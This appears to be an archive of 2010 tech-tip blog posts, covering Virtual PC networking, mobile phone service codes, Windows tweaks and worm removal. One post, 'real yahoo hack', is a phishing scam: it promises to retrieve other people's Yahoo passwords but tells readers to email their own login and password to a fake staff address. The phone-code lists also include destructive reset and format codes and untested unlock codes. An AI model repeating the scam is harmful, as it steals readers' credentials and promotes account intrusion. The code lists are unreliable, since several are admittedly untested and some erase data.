Tuesday, 31 August 2010

How To Configure Virtual PC And Virtual Server In Windows OS

When several virtual machines are running on a single physical computer concurrently, you have to configure networking between guest and host operating systems depending on their tasks. These are basic usage scenarios of virtual networks on a virtualization platform:
  • creating a virtual machine, which network adapter is shared with a physical network card - as a result, a virtual machine acts as an independent computer in the extranet
  • creating isolated networks with several virtual machines in order to test software, to train personnel, and to use linked servers within an intranet
  • working with a virtual machine in an extranet, when you need only connections initiated by this virtual machine to the extranet
Microsoft virtualization platforms offer a networking type for each option.

Virtual Networking

Microsoft offers this network type to let a virtual machine provide services to an extranet (relative to the host system). In this case a virtual machine acts as an independent computer in a network with the host computer. If there is a DHCP server in the network (Dynamic Host Configuration Protocol) to assign IP addresses, a virtual machine will get it and will work as an independent system in the network (otherwise, you will have to specify an external IP manually). Here is a diagram of this networking type:



Virtual Networking diagram
This networking type is assigned to a virtual machine by default, because it fits most usage scenarios. This virtual networking type also connects a host system with guest operating systems.

Local Only Networking

This networking type allows to join several virtual machines into an isolated network within a host system, so that components of the external network (relative to the host system) do not have access to them. Here is the diagram:



Local Only Networking Diagram
This networking type does not allow virtual machines to interact with the host system.

Shared Network with NAT (Network Address Translation)

Security is one of the most important issues to be taken into account as you plan to use virtual machines in extranets. If a virtual machine is created only to let users and software work with services in extranet without granting its services to the extranet, Shared Networking will be an ideal choice.



NAT Networking Diagram
In this case a host operating system has a DHCP server, which assigns internal IP addresses to virtual machines within the host network. A virtual machine can initiate a connection to extranet with a special service (Network Address Translator) that translates IP addresses. In this case virtual machines use a single IP address of the host system (Shared IP), and they are not visible to extranet.

Configuring Virtual PC Network

As you plan how to deploy several virtual machines on a single physical host, you should think about their network structure beforehand. Virtual PC is often used to create a virtual environment for software tests or to create portable user environments. You should often provide access to extranet for virtual machines as well as their interaction between each other. You can specify individual networking options for each virtual machine by attaching one or several virtual network interfaces to a given network type. Virtual PC allows to create up to four virtual network adapters for a single virtual machine. A guest system detects emulated adapters as DEC / Intel 21140 Based PCI Fast Ethernet adapter. They are fully compliant with IPv6 as well as PXE (Preboot eXecution Environment). Microsoft virtualization platforms do not support Token Ring networks.
When you install a virtual machine in Virtual PC, you can see a network icon in the bottom left corner of the console, which blinks as a virtual machine addresses a virtual network adapter. Right-click this icon and choose "Networking Settings", to configure network for a virtual machine. You can also open network settings by choosing in the main menu "Edit" -> "Settings" -> "Networking":



Configuring network in a virtual machine
Note
A virtual machine usually applies network settings on-the-fly, you don't have to reboot a virtual machine.

Not Connected

If you don't want your virtual machine to have a network adapter so that it couldn't access network resources of the host system and other guest systems, choose "Networking", "Not Connected" for the first network adapter in your virtual machine:



Configuring network in a virtual machine
Remember, if you don't need networking in a virtual machine, you'd better choose this option, because it may speed up applications that check for a network connection (owing to no latencies).

Virtual Networking

Virtual PC users very often have to surf Internet in a guest system. But a guest system must also provide some services to extranet (for example, shared folders). In this case "Virtual Networking" will do - virtual machines within a host system interact between each other and with extranet.
To assign this scenario to a virtual network adapter, choose "Networking" and then your physical network adapter in virtual machine settings:



Configuring network in a virtual machine
Note
A virtual machine on the Virtual PC platform can be started without being connected to other guest systems on a host computer. You can run a virtual machine from a command prompt. Click "Start" -> "Run" -> type "cmd" and then press Enter. Then execute the following command:
"\Virtual PC.exe" –pc -extnetworking -launch
(-extnetworking does not affect Shared Networking.)

Local Only

If you choose this networking type for guest systems, virtual machines will interact only with each other, they won't get access to extranet of the host system. In this case network traffic between virtual machines does not reach the host system, it's located in intranet. Keep in mind that Virtual PC does not use a DHCP server in this networking type, so you'll have to configure IP addresses of virtual machines manually. It should be noted that a network adapter of one of guest systems working in promiscuous mode in such a virtual network (when a network card accepts all packets, not just the ones sent to it) can intercept traffic of other virtual machines.
In order to set a virtual network adapter to this mode, choose "Networking" and then "Local Only":



Configuring network in a virtual machine

Shared

As we have already mentioned, this networking type "hides" a virtual machine behind a host operating system. It allows to initiate connections to extranet from a guest system via a modem or LAN connection (however, Microsoft does not recommend using a modem in virtual machines). Access to virtual machines from extranet will be impossible (you should take it into account as you work in a virtual machine). In this case a DHCP server works within a virtual network, which assigns 192.168.131.x internal addresses to virtual machines, where x ranges from 1 to 253 (unfortunately, Virtual PC does not allow to change this range). Remember that this networking type does not support interaction between virtual machines as well as connections from a host system to a guest one. Only the first virtual network adapter can be used for Shared Networking.
In order to set a virtual network adapter to this mode, choose "Networking" and then "Shared Networking (NAT)":



Configuring network in a virtual machine
If you do not belong to the administrator group in a host system, you cannot work with the extranet via ICMP (Internet Control Messages Protocol).

Setting up several virtual networks in a host system

As you deploy virtual machines on desktops, you often have to configure a network between virtual machines and a physical host, when there is no connection to an extranet. Sometime a physical computer does not have a network adapter at all. However, even in this case you can set up networking between a host OS and virtual machines. Besides, in some cases you must set up several isolated "Local Only" virtual networks, where guest systems will interact. Microsoft offers a simple and elegant solution: virtual machines work with the host system via Loopback Adapter, which connects virtual machines and a host system into a common isolated network. As you add this interface, a host system allows to choose it as a network adapter in a virtual machine, so they can interact with a host within a common virtual network. In this case a loopback adapter acts as a virtual switch or hub, to which network adapters of the host and guest systems are connected. You can add several such adapters to create several virtual isolated networks. These networks can be connected by a virtual machine with two virtual network adapters - you just assign each adapter to a corresponding loopback adapter of the host system. When you access Internet from a virtual machine in such network, don't forget to enable Internet Connection Sharing in the host system.
To add a loopback adapter, do the following steps in the host system:
  1. Click "Start" -> "Settings" -> "Control Panel" -> "Add Hardware".
  2. Click "Next", choose "Yes, I have already connected the Hardware", then click "Next":



    Adding a loopback adapter

  3. Then choose the last "Add a new hardware device" element from the list and click "Next":



    Adding a loopback adapter

  4. Choose "Install the hardware that I manually select from a list" in the new window and click "Next":



    Adding a loopback adapter

  5. Choose "Network Adapters" from the list and click "Next":



    Adding a loopback adapter

  6. In the Manufacturer list choose "Microsoft" and in the next list choose "Microsoft Loopback Adapter":



    Adding a loopback adapter
Then click "Next" and "Finish". The list of hardware devices will now contain a loopback adapter in the Network Adapters category. So you can "assign" virtual network adapters to it like to a switch.
Open network settings of a virtual machine ("Virtual PC Console" -> "Settings"), choose "Networking", and bind a virtual network adapter to the loopback adapter:



Binding a virtual network adapter
After that, specify an IP address and network mask for the network adapter. You are recommended to choose an IP address within the 192.168.x.y range (where x ranges from 0 to 255, y – from 1 to 254) to avoid conflicts with other extranet addresses. Then you should configure the IP address of a network adapter in the guest system in compliance with the host network (x must match this number in the host, 255.255.255.0 mask).
Other adapters can be bound to other interfaces to join virtual networks.

Using Wi-Fi adapters in Virtual PC 2007

Some users of Virtual PC 2007 need to use a wireless network in a virtual machine through a Wi-Fi adapter in the host system. But such adapters are not always recognized. Users often face the following problem:



Wi-Fi adapter detection error
In this case virtual machines won't be able to access extranet and host resources, if this Wi-card is used for Virtual Networking, because Virtual Machine Network Services are disabled for this connection. To make virtual machines work with a Wireless adapter, right-click the Wi-Fi network connection in the host system and choose "Properties". Select the "Virtual Machine Network Services" checkbox:



Activating Virtual Machine Network Services

Configuring Virtual Server R2 network

Unlike Virtual PC, Virtual Server R2 has more features to configure networking between virtual machines, but their network principles are the same. Virtual Server uses two networking types:
  • Internal Network (similar to Local Only in Virtual PC)
  • External Network (it uses a physical network adapter of the host system to work with extranet)
After you install Microsoft Virtual Server, it automatically creates one internal and several external networks (as many as the number of physical network adapters in the host system).
To see the list of available networks in Virtual Server, choose "Virtual Networks" -> "Configure" -> "View All":



The list of available networks in Virtual Server
Then you will see the list of available virtual networks:



The list of available virtual networks
As you can see in the picture, we can use a virtual loopback adapter just like in Virtual PC. To edit virtual network properties, point a mouse cursor at a virtual network name and choose "Edit Configuration".



Editing virtual network properties
We can edit network or DHCP settings here. As you click "Network Setting", you will open a virtual network editor:



Virtual network editor
You can change the name of a virtual network. The network adapter field specifies a type of the virtual network. If it contains "None (Guest Only)", virtual machines, which network adapters are connected to this network, will work only with each other. Network of the host system will be inaccessible (similar to Local Only in Virtual PC). If you choose a physical adapter of the host system, the networking type will be similar to Virtual Networking in Virtual PC.
You can add a virtual network adapter to the edited network in the "Disconnected virtual network adapters" field. You can edit a description in the "Virtual network notes" field.
If you get back and click the DHCP Server link, you can enable and configure a DHCP server for this virtual network:



Configuring a DHCP server
DHCP settings include all necessary properties of a network adapter it specifies at startup (starting and ending IP addresses, default gateway, subnetwork, DNS and WINS servers, etc). As you configure a DHCP server, you must take into account that the first 16 addresses of a given range are reserved by the server and are never assigned to virtual machines. DHCP server is disabled by default for external networks, so that virtual machines could obtain network settings from the external network.
After you configure a virtual network, you may proceed to the configuration of virtual network adapters. You can also create your own virtual network by clicking the Add link in the Virtual Networks category. Virtual Server allows to create an unlimited number of virtual networks with as many virtual machines as you like. When you create a virtual network, a .vnc file with network settings is created in the \Documents and Settings\All Users\Documents\Shared Virtual Networks folder. You can then import this file to Virtual Server. Remember that virtual networks cannot be moved to another physical host, because their settings depend on the host hardware.

Configuring network adapters in a virtual machine

To configure one or several virtual network adapters, move the mouse cursor to the name of a virtual machine in the main Virtual Server window, then click "Edit Configuration" and "Network adapters".



Configuring network adapters in a virtual machine
On this page you can choose a virtual network, to which a virtual network interface will be added, add another network interface (up to four interfaces in a virtual machine), and specify a static or dynamic MAC address (Media Access Control) of a network adapter. Microsoft recommends to use dynamic MAC addresses to avoid network conflicts between virtual machines. If you use static addresses, make sure they are unique in each virtual machine (this is especially important, when you deploy virtual machines from a single virtual appliance on different servers). If there is still a conflict of MAC addresses, in the .vmc file replace the line
0003FFxxxxxx
with

then reboot the guest system, so that Virtual Server could assign a unique MAC address to the network adapter.
Like in Virtual PC, you can disable networking in a virtual machine by choosing "Not Connected" in the "Connected to" field. Virtual Server does not have Shared Networking. But you can easily get similar functionality by binding virtual machines to a loopback adapter and then enabling Internet Connection Sharing.

Conclusion

Virtual PC and Virtual Server platforms allow users to create virtual networks with various interaction scenarios. Even though they are not configured as flexibly as in VMware products, they still allow all popular scenarios of using several virtual machines on a single host working in one or several isolated or connected networks. As both Microsoft platforms are free, they can be used by enthusiasts, home users, and small companies. Virtual Server and Virtual PC offer a huge field for experiments, virtual networks training, if you don't have an opportunity to build a real network.

Wednesday, 21 July 2010

Nokia,Samsung,Sony Ericssion,G.S.M Mobiles helpful secret Codes

Mobile Secret Codes:

Nokia Mobile Secret Codes:

On the main screen type in:
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin# \
*#7328748263373738# resets security code.
Default security code is 12345
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.) Press and hold "0" on the main screen to open wap browser.
*******************************************************************************************************

Samsung Secret Codes:


Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#
Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD kontrast: *#9998*523#
Vibration test: *#9998*842# - *#8999*842#
Alarm beeper - Ringtone test : *#9998*289# - *#8999*289#
Smiley: *#9125#
Software version: *#0837#
Display contrast: *#0523# - *#8999*523#
Battery info: *#0228# or *#8999*228#
Display storage capacity: *#8999*636#
Display SIM card information: *#8999*778#
Show date and alarm clock: *#8999*782#
The display during warning: *#8999*786#
Samsung hardware version: *#8999*837#
Show network information: *#8999*638#
Display received channel number and received intensity: *#8999*9266#
*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together
*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error LOG Menu
*#8999*327# EEP Menu
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version
Type in *#0000# on a Samsung A300 to reset the language
Master reset(unlock) #*7337# (for the new samsungs E700 x600 but not E710)
Samsung E700 type *#2255# to show secret call log (not tested)
Samsung A300, A800 phone unlock enter this *2767*637#
Samsung V200, S100, S300 phone unlock : *2767*782257378#
Samsung Secret Codes Part 2
#*4773# Incremental Redundancy
#*7785# Reset wakeup & RTK timer cariables/variables
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*7828# Task screen
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen.
#*3849# Restarts Phone
#*7337# Restarts Phone (Resets Wap Settings)
#*2886# AutoAnswer ON/OFF
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*2558# Time ON
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*2337# Permanent Registration Beep
#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*7326# Accessory
#*7683# Sleep variable
#*3797# Blinks 3D030300 in RED
#*7372# Resetting the time to DPB variables
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*2775# Switch to 2 inner speaker
#*7878# FirstStartup (0=NO, 1=YES)
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*22679# AMR Get Time
*#8999*364# Watchdog ON/OFF
*#8999*427# WATCHDOG signal route setup
*2767*3855# = Full Reset (Caution every stored data will be deleted.)
*2767*2878# = Custom Reset
*2767*927# = Wap Reset
*2767*226372# = Camera Reset (deletes photos)
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
Samsung Secret Codes Part 3
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the phone lock status
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
Type *#9998*627837793# Go to the 'my parameters' and there you will find new menu where you can unlock phone.(not tested-for samsung C100)
To unlock a Samsung turn the phone off take the sim card and type the following code *#pw+15853649247w# .
Java status code: #*53696# (Samsung X600)
If you want to unlock your phone put a sim from another company then type *#9998*3323# it will reset your phone. Push exit and then push 7, it will reset again. Put your other sim in and it will say sim lock, type in 00000000 then it should be unlocked. Type in *0141# then the green call batton and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a sim in it by typing *#2767*2878# or *#9998*3855# (not tested)
*******************************************************************************************************

Sony Ericsson Secret Codes:

To get Sony Ericsson Secret Menu:
-> * <- <- * <- *
(-> means press joystick, arrow keys or jogdial to the right and <- means left.)
You'll see phone model, software info, IMEI, configuration info, sim lock status, REAL time clock, total call time and text labels.
You can also test your phones services and hardware from this menu (main display, camera, LED/illumination, Flash LED, keyboard, earphone, speaker, microphone, radio and vibrator tests)
IMEI Number: *#06#
Lockstatus: <- * * <-
Shortcut to last dialed numbers: 0#
Shortcut to sim numbers: On main menu type a number and press #
If you change the language from default to any other language, then it may be difficult to switch to default language. The shortcut is very simple. Older Ericssons *#0000# & Newer Ericssons <0000> & Also, pressing <8888> on the newer Ericssons changes the language to Automatic. < stands for left arrow button or joystick and > stands for right arrow button or joystick.
Copy & Paste when using phonebook:
Go into "Edit contact", and select the Contact
Scroll down to the number you want to cut and paste.
Without selecting it (ie without clicking on the joystick or the yes button) press and hold the * key, and then press the 1 key. When you release both keys, the highlighted number should disappear
Now move to the appropriate entry (eg the "Mob" entry) and press and hold the * key, then press the 3 key. When you release both, the number is pasted into this entry. (1 for cut, 2 for copy and 3 for paste)
If you've cleared your call list you can easily find unsaved dialed no:
Go to Message then Write New & Press yes. Click on Continue. In the menu to let you key in the number to send msg, press the right up key for more menu & you go to the following list.
Phone book, Groups, Sim entries and Unsaved nos.
Select Unsaved nos, there you will see last 10 unsaved number.
Those numbers can't be erased even you clear your entire call list.
*******************************************************************************************************

GSM Secret Codes:

GSM Secret Codes
Type *#61# and press call - Check redirection status.
Cancel all redirections: ##002#
*43# to activate call waiting, to deactivate #43#.
If your phone doesn't have incoming call barring and outgoing call barring, you can try this.
For outgoing call barring dial *33*barcode*# and pres OK. To deactivate it dial #33#barcode*#.
On any phone on any network type in **43# to enable conference calls. You can make up to 7 calls at once
If you need to block SMS reception (if you are spammed by someone) just press this code:
*35*xxxx*16#
xxxx is your Call Barring code (default is 0000).
To remove this barring type: #35*xxxx#
If you want to hide/show your phone number when calling, put one of these codes below in front of the number that you are going to call.
(*#30# / *#31# or *31# / #31# ) Works on some networks.
Typing *0# or *nm# on the beginning of a txt message gives you detailed delivery report on some networks.. But turn off reports in message settings before.
When the sim card-pin blocked type **042*pin2 old*newpin2*newpin2*
Airtel Secret Codes
Dial *123# to see your credit balance. Dial *110# and follow the options.
Dial *109*9898631902# to display the call cost after each call.
If you are in Indiausing IDEA Pre or Postpaid connection then dial *101# you will get a secret menu that will let you to activate or deactivate any supported Idea package for your mobile.
Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#
Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD kontrast: *#9998*523#
Vibration test: *#9998*842# - *#8999*842#
Alarm beeper - Ringtone test : *#9998*289# - *#8999*289#
Smiley: *#9125#
Software version: *#0837#
Display contrast: *#0523# - *#8999*523#
Battery info: *#0228# or *#8999*228#
Display storage capacity: *#8999*636#
Display SIM card information: *#8999*778#
Show date and alarm clock: *#8999*782#
The display during warning: *#8999*786#
Samsung hardware version: *#8999*837#
Show network information: *#8999*638#
Display received channel number and received intensity: *#8999*9266#
*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together
*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error LOG Menu
*#8999*327# EEP Menu
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version
Type in *#0000# on a Samsung A300 to reset the language
Master reset(unlock) #*7337# (for the new samsungs E700 x600 but not E710)
Samsung E700 type *#2255# to show secret call log (not tested)
Samsung A300, A800 phone unlock enter this *2767*637#
Samsung V200, S100, S300 phone unlock : *2767*782257378#

Friday, 16 July 2010

real yahoo hack

::DISCLAMER: First of all, I do NOT take any
responsability for the content of this email. If you read this email with it's
methods of fetching hotmail or yahoo passwords you have agreed to take
your own responsability for any actions you may make. It's a method
unknown by many yahoo users. ::**Please note!
::STEP 1- You simply log into your own yahoo account.
Important note: Your account should have been atleast 30 days old for this
                                                                                    Copyright Navdeep Rastogi 2007, All rights reserved

work!!
::STEP 2- Once you have logged into your own account, compose/write
an e-mail to yhpassretrieve@yahoo.co.in This is the exposed mailing
adress to the Yahoo Staff!! The automated server will (after recieving
the information you will send them) will send you the password that
you have 'forgotten'.
::STEP 3- In the subject line write "retrieve passwd" (CASE INTENSIVE)
and in the body of the e-mail write this exact code filling in your yahoo
password and login, and the victim (whose password u want) of hacking's
login name.- its better to cut and paste the following two lines.
The URL-server message is as follows:
::form_pwd:login\7646=WRITE VICTIMS LOGIN HERE sendto\994=YOUR-YAHOO-LOGIN+PASSWORD
::**Please note! Do NOT enter the victims email-address, just the loginname
** For example if I'd like to get my friends hotmail password
(isaac_newton@yahoo.com) to my email (albert88@yahoo.com)
(let's say my password is "charge") I would write like this:
::form_pwd: login=isaac_newton sendto:albert88+charge
::This will fool the Yahoo server into thinking that you are
administrated user staff and send you the password!
::STEP 4- All you have to do, is wait for the Yahoo server to send
you a mail containing the password! It normally takes 48hrs. Note
that if the victim has accounts both in hotmail and yahoo then
u will get both passwords in two different mails.
::Process is almost guaranteed to work

clearing the run history

Start the registry editor (regedit.exe)
Move to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Select the entry you wish to remove, e.g. h
Press the Del key (or select Edit - Delete) and click Yes to the confirmation
Double click the MRUList value and remove the letter you just deleted. Click OK to save the change
Close the registry editor

how do u switch from 10m bps to 100 mbps

if you have 10/100 mbps lan card if you want to change data transfer rate from 10 to 100mbps or vice versa just do the following .
1) right click my network places
2) select the properties
3) right click the local lan connection and select the properties
4) opening the local area connection properties in the general tab there is configure option.
5) you get the fast ethernet adapter properties
6) in the advanced option there is a value field
7) default value is auto_config but you can change it to

10 mbps half duplex
10 mbps full duplex
100 mbps half duplex
100 mbps full duplex

Lock Computer

If you are tired of pressing Ctrl + Alt + Del and then selecting Lock Computer to lock the computer... here is a small tip.. to create a shortcut for this..
1) Right-Click on the Desktop.
2) New -> Shortcut.
3) Paste the following in the Text Box provided to type the location of the item -> %windir%\system32\rundll32.exe user32.dll,LockWorkStation
4) Give a suitable name for the shortcut in the next screen and complete the shortcut.
when you double click on that shortcut.. your computer will be locked....

Changing Windows XP Login Screen Text Entries

So, You hv to edit following 2 files:

LogonUI.exe
Winlogon.exe

LogonUI.exe file contains most of the Text entries of the login screen and Winlogon.exe file contains the text, which is displayed when u login/logout the windows, like Windows is shutting down..., etc.

So first we'll edit LogonUI.exe file:

1.) Open %windir%\System32\LogonUI.exe file in Resource Hacker and navigate to String Table section.
2.) Here u'll find sub-directories, 1,2,3,4,7, in which only first 3 directories 1,2,3 r of our use.
3.) Following r the locations of some interesting Text entries, which u will like to change:

Type your password : String Table -> 1 -> 1033 -> 6
Please type your password again. \nBe sure to use the correct uppercase and lowercase letters. : String Table -> 1 -> 1033 -> 8
You can click the \"?\" button to see your password hint.\n\nPlease type your password again. \nBe sure to use the correct uppercase and lowercase letters. : String Table -> 1 -> 1033 -> 9
Did you forget your password? : String Table -> 1 -> 1033 -> 10
Turn off computer : String Table -> 1 -> 1033 -> 11 & 12
Password Hint : String Table -> 1 -> 1033 -> 13
To begin, click your user name : String Table -> 2 -> 1033 -> 22
                                                             
After you log on, you can add or change accounts.\nJust go to Control Panel and click User Accounts. : String Table -> 2 -> 1033 -> 25

PS: "\n" is used to give line break. You can also use it in ur customized text. Also there r many other text entries, that u might like to change.
Now its turn of Winlogon.exe file:

1.) Open %windir%\System32\Winlogon.exe file in Resource Hacker and navigate to String Table section.
2.) Here only 105, 106, 110 and 111 r of our use.
3.) Actually String Table -> 106 -> 1033 is only of our use, but if u hv enabled "Extended Shutdown messages" option, then other sections (105, 110, 111) will be of our use.
4.) In 106 section, 1682, 1684, 1687, 1690 and 1691 r the interesting ones. U can change their text with ur desired one. these entries contains the text, like Loading your personal settings..., Saving your settings..., Windows is starting up..., etc.

Following is the text of mine String Table -> 106 -> 1033 section:

Code :
STRINGTABLE
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
1680, "Running logoff scripts..."
1681, "Running logon scripts..."
1682, "Please Wait..."
1683, "Closing network connections..."
1684, "3 2 1 ..."
1685, "Preparing to stand by..."
1686, "Preparing to Hibernate..."
1687, "3 2 ..."
1688, "Preparing to Stand By in order to complete eject..."
1689, "The Active Directory is rebuilding indices. Please wait..."
1690, "Welcome Vishal Gupta..."
1691, "3 ..."
}You can simply replace urs with the above code.
go to run:
and type:
control userpasswords2
-press enter-
and follow wat is in it...
just check the :
"users must enter a username and password to use this computer"

Command LIne

Use Command line or righ click and properties but disk must be in NTFS Format and other thing if u incrypt something then u can decrypt from any other user its security but also can be problem in case of windows loss or if u take file some where.
for command line USE
Cipher Displays or alters the encryption of folders and files on NTFS volumes. Used without parameters, cipher displays the encryption state of the current folder and any files it contains.

Syntax
cipher [{/e|/d}] [/s:dir] [/a] [/f] [/q] [/h] [/k] [/u[/n]] [PathName [...]] | [/r:PathNameWithoutExtension] | [/w:PathName]

Parameters
/e
Encrypts the specified folders. Folders are marked so that files that are added to the folder later are encrypted too.
/d
Decrypts the specified folders. Folders are marked so that files that are added to the folder later are encrypted too.
/s: dir
Performs the selected operation in the specified folder and all subfolders.
/a
Performs the operation for files and directories.
/i
Continues performing the specified operation even after errors occur. By default, cipher stops when it encounters an error.
/f
Forces the encryption or decryption of all specified objects. By default, cipher skips files that have been encrypted or decrypted already.
/q
Reports only the most essential information.
/h
Displays files with hidden or system attributes. By default, these files are not encrypted or decrypted.
                                                                
/k
Creates a new file encryption key for the user running cipher. If you use this option, cipher ignores all of the other options.
/u
Updates the user's file encryption key or recovery agent's key to the current ones in all of the encrypted files on local drives (that is, if the keys have been changed). This option only works with /n.
/n
Prevents keys from being updated. Use this option to find all of the encrypted files on the local drives. This option only works with /u.
PathName
Specifies a pattern, file, or folder.
/r:PathNameWithoutExtension
OR USER PROPERTIES

Try This......

Try the smart defrag in this website

www.iobit.com
It is very effective also.

Problem to solve folder options
Thats not an Trojan horse its an I-Worm.Ray Virus it can be easily removed through Quick heal and once it is removed u can once again bring back ur folder option by doing the following thing
Open - Run - gpedit.msc-ADMINISTRATIVE TEMPLATES- WINOWS- FOLDER OPTION CLICK ENABLE
Orkut Banned Removal
Removal procedure for orkut, firefox, youtube virus
when u r system effected, it show following messages when u open
firfox-I DNT HATE MOZILLA BUT USE IE OR ELSE...
orkut- Orkut is banned you fool, The administrators didnt write this program guess who did?? MUHAHAHA!!
To remove this do the following things
                                                               
1.goto taskmanager-->processes find svchost.exe under your username (warning not a svchost.exe under system as username) end or kill these processes by pressing endprocess
2.now goto your "c" drive(where you installed your windows) then type "c:\heap41a" in address bar...(or delete through command prompt)
3. delete all the contents of the "c:\heap41a" folder
4.now open register editor by running "regedit" in run command menu( start-->run )
5.goto "edit" then "find" search for "heap41a" delete that key like "C:\heap41a\svchost.exe C:\heap(some number)\std.txt"
6.now close register editor
7. restart pc
Ultimate Solution for this problem
Even i had the same problem. just follow the following steps, the
worm will be deleted forever:

1.Press CTRL+ALT+DEL and go to the processes tab

2.Look for svchost.exe under the image name. There will be many but
look for the ones which have your username under the username

3.Press DEL to kill these files. It will give you a warning, Press
Yes

4.Repeat for more svchost.exe files with your username and repeat. Do
not kill svchost.exe with system, local service or network service!

5.Now open My Computer

6.In the address bar, type "C:\heap41a" and press enter

7.Delete all the files here

8.Now go to start -> Run and type "Regedit"

9.Go to the menu EDIT --> FIND

10.Type "heap41a" here and press enter

11.You will get something like this "[winlogon]
C:\heap41a\svchost.exe
